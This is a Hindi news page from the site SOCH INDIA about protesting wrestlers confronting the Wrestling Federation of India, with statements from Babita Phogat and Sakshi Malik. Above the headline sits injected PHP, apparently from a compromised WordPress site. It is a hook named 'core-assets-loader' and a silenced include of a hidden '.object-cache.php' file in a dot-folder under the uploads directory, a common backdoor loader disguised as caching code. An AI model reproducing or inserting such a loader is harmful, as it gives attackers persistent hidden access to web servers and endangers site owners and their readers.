add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); WFI vs Wrestler Dispute: बबीता फोगट बोलीं- धुआं वहीं उठता है जहां आग होती है – SOCH INDIA
Menu

देश
WFI vs Wrestler Dispute: बबीता फोगट बोलीं- धुआं वहीं उठता है जहां आग होती है

nobanner

WFI vs Wrestler Dispute: भारतीय कुश्ती महासंघ (WFI) बनाम देश के पहलवानों के बीच का विवाद तूल पकड़ता जा रहा है. राजधानी दिल्ली के जंतर-मंतर पर WFI और WFI अध्यक्ष बृजभूषण शरण सिंह के खिलाफ धरने पर बैठे भारतीय पहलवानों को अब मनाने का प्रयास किया जा रहा है. चैंपियन पहलवान और भाजपा नेत्री बबीता फोगट ने पहलवानों को इस मामले में निष्पक्ष जांच का भरोसा दिलाया है. बबीता फोगट ने कहा कि मेरी कोशिश है कि मैं आज ही समाधान करवा दूं। ये कोई छोटी चीज़ नहीं है, धुआं वहीं उठता है जहां आग लगी होती है। मैं भरोसा दिलाती हूं कि मामले की निष्पक्ष जांच की जाएगी.

वहीं, इंडियन रेशलर साक्षी मलिक ने कहा कि बबीता फोगाट सरकार की तरफ से आईं हैं और हमने भी अपनी बात उनके सामने रखी है। उन्होंने आश्वस्त किया है कि वो हमारे साथ हैं और हमारी मांगें पूरी करवाएंगी। हमारा धरना तब तक जारी रहेगा जब तक कोई क्लैरिटी नहीं आ जाती.